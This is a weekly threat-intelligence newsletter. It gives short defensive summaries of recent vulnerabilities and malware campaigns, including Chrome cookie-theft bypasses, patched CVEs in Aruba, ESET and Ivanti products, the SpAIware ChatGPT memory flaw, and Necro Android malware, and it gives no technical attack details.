Welcome to this week’s Threat Intelligence Roundup! Each week we cover the latest on emerging threats, trends, and top security practices, all tailored just for you.
Threat Intel Thursdays are designed to give you a wider perspective and arm you with the knowledge you need to make smart security decisions.
Threat Intelligence Email Blasts This Week:
Infostealer Malware Bypassing Chrome’s New Cookie-theft Defenses Security researchers have identified a new variant of infostealer malware that bypasses Google Chrome’s recently introduced cookie theft defenses. Chrome’s latest update aimed to protect stored cookies by restricting access to them, especially by malicious actors trying to steal session data. However, attackers have already adapted, using advanced tactics such as memory dumping and other techniques to steal cookies directly from a machine’s memory before they are protected. This is a reminder that teams should continue to focus on strong password management and avoid storing passwords within the browser.
HPE Aruba Fixes Severe Flaws in Access Points HPE Aruba Networking has patched three critical remote code execution vulnerabilities, identified as CVE-2024-42505, CVE-2024-42506, and CVE-2024-42507, affecting its wireless access points. These vulnerabilities could allow attackers to execute arbitrary code remotely, potentially compromising network security and gaining control over the affected devices. The flaws pose significant risks to organizations using these access points for wireless connectivity, making immediate patching essential. HPE is advising organizations to install the latest updates on affected devices immediately.
This Week’s Roundup:
ESET Fixes Two Privilege Escalation Exploits ESET has patched two local privilege escalation vulnerabilities, including CVE-2024-7400, which carries a CVSS score of 7.3. These vulnerabilities could allow attackers to gain elevated privileges on the system, bypassing user restrictions and executing administrative actions. It is critical that teams apply ESET’s most recent update to protect against this exploit.
Kaspersky Removes Itself, Installs UltraAV Antivirus With No Prompt Kaspersky users were alarmed when the antivirus uninstalled itself and installed UltraAV without any notification or prior warning. The lack of communication raised concerns about transparency and user control, as the unexpected replacement of security software could expose systems to potential risks.
ChatGPT for macOS Enabled Long-Term Spyware via Memory OpenAI has patched a vulnerability in the ChatGPT app for macOS that could have made it possible for hackers to place spyware into the tool’s memory. The exploit, named SpAIware, can be used to pull data from user typing or responses by abusing ChatGPT’s Memory feature. Teams are advised to update immediately to resolve this issue.
Severe Ivanti vTM Auth Bypass Now Exploited A critical authentication bypass vulnerability in Ivanti’s VTM (Virtual Traffic Manager), tracked as CVE-2024-7593, is now being actively exploited in attacks. This flaw enables unauthorized attackers to bypass authentication mechanisms and access the administrative interface, potentially giving them full control over affected systems. Security experts urge organizations using Ivanti VTM to apply the necessary patches immediately to protect against ongoing exploitation.
Generative AI Malware Now Used in Phishing Attacks HP researchers detected a malware generated by generative AI used to deliver AsyncRAT when investigating a malicious email. Analysis of the code revealed signs that threat actors are now leveraging AI to create malicious code, which previously had been rare. This case highlights how generative artificial intelligence is making it easier for hackers to develop malware and emphasizes a heightened focus on layered security.
Necro Android Malware Found in Popular Apps in App Store Security researchers have discovered Necro Android malware hidden in several popular Android apps on the Google Play Store. This malware, once installed, can steal sensitive data, execute commands, and even install additional malicious payloads on infected devices. Organizations are strongly urged to check for affected apps, remove them immediately.